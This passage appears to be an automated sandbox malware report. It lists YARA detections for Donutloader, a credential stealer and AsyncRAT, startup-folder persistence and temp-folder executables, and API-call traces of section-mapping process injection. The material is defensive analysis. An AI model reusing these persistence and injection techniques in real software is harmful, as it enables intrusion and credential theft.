Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2723831402.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2754315012.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2771030562.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2730614080.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2722975569.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2722293127.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2725597045.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2710789516.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2731443501.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2727021426.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2739250905.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2752660197.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2723350462.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2717828329.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2729723839.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2742008984.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2724319284.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2719837852.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2758698968.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2712752600.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2708630118.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2720461285.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2723578701.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2776713870.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2709425856.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2755765859.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2728281717.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2782316881.0000000000560000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2721584393.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2734445019.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000003.2709861506.000000000054E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	01:44:44
Start date:	27/07/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Imagebase:	0x7ff621210000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:44:45
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Imagebase:	0x7ff6a2810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:44:45
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:44:45
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:44:50
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092
Imagebase:	0x540000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	01:44:57
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5724 -s 1680
Imagebase:	0x540000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	01:45:18
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\8EC7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\8EC7.exe"
Imagebase:	0x7ff6415f0000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:45:18
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	01:45:27
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\8EC7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\8EC7.exe"
Imagebase:	0x7ff6415f0000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	01:45:27
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exePID: 6544, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	64.7%
Total number of Nodes:	51
Total number of Limit Nodes:	2

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 0040192A Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717933615.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717957818.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Non-executed Functions

Function 00403303 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

s, xrefs: 00403351

Memory Dump Source

Source File: 00000000.00000002.1717907459.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1717881647.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
